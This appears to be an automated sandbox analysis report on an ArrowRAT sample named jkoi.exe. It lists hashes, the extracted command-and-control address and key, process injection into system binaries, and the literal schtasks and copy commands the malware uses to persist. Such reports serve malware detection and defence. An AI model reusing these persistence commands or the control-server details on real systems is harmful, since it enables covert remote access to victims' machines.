Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-09-2024 12:39
Static task
static1
Behavioral task
behavioral1
Sample
jkoi.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
jkoi.exe
Resource
win10v2004-20240802-en
General
-
Target
jkoi.exe
-
Size
300.0MB
-
MD5
135b97e053b660f8e6cacd58965b93cd
-
SHA1
828e92ad30ac243ec063252a338519e4429940e3
-
SHA256
e659861670260fa5252d5315d71466659e321a90a357aa3005304f145c4a2027
-
SHA512
6b19d2143f021feeccf5833b57fff55fbae3c72ea0eb480a893b48acd9ce2bdb0c895cd3516133436b4e937f97ee4e42ce58b4aa3729d1f3c29fa837bc19366c
-
SSDEEP
12288:VD9TFmMwfrck/YEwEVhftq6rmIGD9P5X5U4LVkYdS7Ffi:KgERVNQ6Fq9hX5U4L94Zi
Malware Config
Extracted
arrowrat
Client
vncnew1984.duckdns.org:1984
ecZCILAfG
Signatures
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2592 set thread context of 2728 2592 jkoi.exe 31 PID 2728 set thread context of 2784 2728 RegAsm.exe 35 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jkoi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 844 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2728 RegAsm.exe 2728 RegAsm.exe 2728 RegAsm.exe 2728 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2592 jkoi.exe Token: SeDebugPrivilege 2728 RegAsm.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe Token: SeShutdownPrivilege 2424 explorer.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe 2424 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2728 RegAsm.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2592 wrote to memory of 2728 2592 jkoi.exe 31 PID 2728 wrote to memory of 2424 2728 RegAsm.exe 33 PID 2728 wrote to memory of 2424 2728 RegAsm.exe 33 PID 2728 wrote to memory of 2424 2728 RegAsm.exe 33 PID 2728 wrote to memory of 2424 2728 RegAsm.exe 33 PID 2728 wrote to memory of 2676 2728 RegAsm.exe 34 PID 2728 wrote to memory of 2676 2728 RegAsm.exe 34 PID 2728 wrote to memory of 2676 2728 RegAsm.exe 34 PID 2728 wrote to memory of 2676 2728 RegAsm.exe 34 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35 PID 2592 wrote to memory of 2984 2592 jkoi.exe 37 PID 2592 wrote to memory of 2984 2592 jkoi.exe 37 PID 2592 wrote to memory of 2984 2592 jkoi.exe 37 PID 2592 wrote to memory of 2984 2592 jkoi.exe 37 PID 2592 wrote to memory of 2064 2592 jkoi.exe 38 PID 2592 wrote to memory of 2064 2592 jkoi.exe 38 PID 2592 wrote to memory of 2064 2592 jkoi.exe 38 PID 2592 wrote to memory of 2064 2592 jkoi.exe 38 PID 2592 wrote to memory of 2684 2592 jkoi.exe 39 PID 2592 wrote to memory of 2684 2592 jkoi.exe 39 PID 2592 wrote to memory of 2684 2592 jkoi.exe 39 PID 2592 wrote to memory of 2684 2592 jkoi.exe 39 PID 2424 wrote to memory of 1968 2424 explorer.exe 41 PID 2424 wrote to memory of 1968 2424 explorer.exe 41 PID 2424 wrote to memory of 1968 2424 explorer.exe 41 PID 2064 wrote to memory of 844 2064 cmd.exe 44 PID 2064 wrote to memory of 844 2064 cmd.exe 44 PID 2064 wrote to memory of 844 2064 cmd.exe 44 PID 2064 wrote to memory of 844 2064 cmd.exe 44 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\jkoi.exe"C:\Users\Admin\AppData\Local\Temp\jkoi.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:1968
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG3⤵PID:2676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG3⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\kio"2⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:844
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\jkoi.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {807E9F0D-21CF-4BA1-90CD-E2CEF0D145AA} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]1⤵PID:1984
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Active Setup
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Active Setup
1Scheduled Task/Job
1Scheduled Task
1